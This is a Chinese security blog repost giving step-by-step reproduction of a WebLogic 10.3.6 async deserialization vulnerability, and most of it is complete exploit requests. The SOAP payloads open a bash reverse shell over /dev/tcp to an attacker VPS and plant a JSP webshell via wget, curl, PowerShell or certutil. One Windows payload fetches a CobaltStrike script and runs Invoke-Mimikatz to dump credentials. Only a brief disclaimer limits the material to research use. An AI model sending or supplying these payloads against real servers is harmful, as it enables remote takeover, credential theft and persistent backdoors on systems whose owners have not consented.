最新weblogic漏洞复现

最新weblogic漏洞复现
2019-10-17 18:08:00 Author: mp.weixin.qq.com(查看原文) 阅读量:142 收藏

点击上方“凌天实验室”，“星标或置顶公众号”

漏洞、技术还是其他，我都想第一时间和你分享

复现环境

Kali2019\Win10(关闭安全中心实时防护下)
Weblogic10.3.6(wls1036_generic.jar)

漏洞组件

bea_wls9_async_response.war

漏洞路径

http://ip:port/_async/AsyncResponseService

漏洞确认

访问漏洞路径存在以下页面，即有可能存在漏洞

漏洞确认

漏洞利用

(所有利用都需要被攻击机能够访问公网)

一

linux下

1、反弹shell

使用如下报文即可

POST /_async/AsyncResponseService HTTP/1.1Host: ip:portContent-Length: 853Accept-Encoding: gzip, deflateSOAPAction:Accept: */*User-Agent: Apache-HttpClient/4.1.1 (java 1.5)Connection: keep-alivecontent-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>/bin/bash</string></void><void index="1"><string>-c</string></void><void index="2"><string>bash -i &gt;&amp; /dev/tcp/vpsip/vpsport 0&gt;&amp;1</string></void></array><void method="start"/></void></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>

反弹shel

2、上传webshell

放置一个webshell.txt到公网
使用以下报文任选其一

报文一

POST /_async/AsyncResponseService HTTP/1.1Host: ip:portContent-Length: 789Accept-Encoding: gzip, deflateSOAPAction:Accept: */*User-Agent: Apache-HttpClient/4.1.1 (java 1.5)Connection: keep-alivecontent-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>/bin/bash</string></void><void index="1"><string>-c</string></void><void index="2"><string>wget http://vpsip:vpsport/webshell.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp</string></void></array><void method="start"/></void></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>

报文二

POST /_async/AsyncResponseService HTTP/1.1Host: ip:portContent-Length: 789Accept-Encoding: gzip, deflateSOAPAction: Accept: */*User-Agent: Apache-HttpClient/4.1.1 (java 1.5)Connection: keep-alivecontent-type: text/xml<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>/bin/bash</string></void><void index="1"><string>-c</string></void><void index="2"><string>curl http://vpsip:vpsport/webshell.txt -o servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp</string></void></array><void method="start"/></void></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>

3、访问webshell

http://ip:port/_async/webshell.jsp

win下

1、反弹shell

可直接使用CobaltStrike生成一个payload.ps1 powershell脚本，将该脚本放到公网上，然后使用如下报文即可

POST /_async/AsyncResponseService HTTP/1.1Host: ip:portContent-Length: 861Accept-Encoding: gzip, deflateSOAPAction:Accept: */*User-Agent: Apache-HttpClient/4.1.1 (java 1.5)Connection: keep-alivecontent-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>cmd</string></void><void index="1"><string>/c</string></void><void index="2"><string>powershell "IEX (New-Object Net.WebClient).DownloadString('http://ip:port/payload.ps1'); Invoke-Mimikatz -DumpCreds"</string></void></array><void method="start"/></void></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>

2、上传webshell

放置一个webshell.txt到公网
使用以下报文任选其一均可

报文一

POST /_async/AsyncResponseService HTTP/1.1Host: ip:portContent-Length: 854Accept-Encoding: gzip, deflateSOAPAction: Accept: */*User-Agent: Apache-HttpClient/4.1.1 (java 1.5)Connection: keep-alivecontent-type: text/xml<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>cmd</string></void><void index="1"><string>/c</string></void><void index="2"><string>powershell (new-object System.Net.WebClient).DownloadFile( 'http://ip:port/webshell.txt','servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp')</string></void></array><void method="start"/></void></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>

报文二

POST /_async/AsyncResponseService HTTP/1.1Host: ip:portContent-Length: 854Accept-Encoding: gzip, deflateSOAPAction:Accept: */*User-Agent: Apache-HttpClient/4.1.1 (java 1.5)Connection: keep-alivecontent-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>cmd</string></void><void index="1"><string>/c</string></void><void index="2"><string>certutil -urlcache -split -f http://ip:port/webshell.txt servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp</string></void></array><void method="start"/></void></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>3.访问webshellhttp://ip:port/_async/webshell.jsp

访问webshell

(注：上述报文中

servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/为默认路径，如果路径修改，可以配合反弹shell进行获取)

清水川崎投稿安全祖师爷，仅供白帽子、安全爱好者研究学习，对于用于非法途径的行为，发布者及作者不承担任何责任。

凌天

实验室

凌天实验室，是安百科技旗下针对应用安全领域进行攻防研究的专业技术团队，其核心成员来自原乌云创始团队及社区知名白帽子，团队专业性强、技术层次高且富有实战经验。实验室成立于2016年，发展至今团队成员已达35人，在应用安全领域深耕不辍，向网络安全行业顶尖水平攻防技术团队的方向夯实迈进。

文章来源: http://mp.weixin.qq.com/s?__biz=MzU5Mzc4MTIyNw==&mid=2247485033&idx=1&sn=bfe7a91093a3c3e9aa52fd94c9646907&chksm=fe0a0eedc97d87fb16a097d3be22e63b12366868630404209861e8887b2937932870f665ab39#rd
如有侵权请联系:admin#unsafe.sh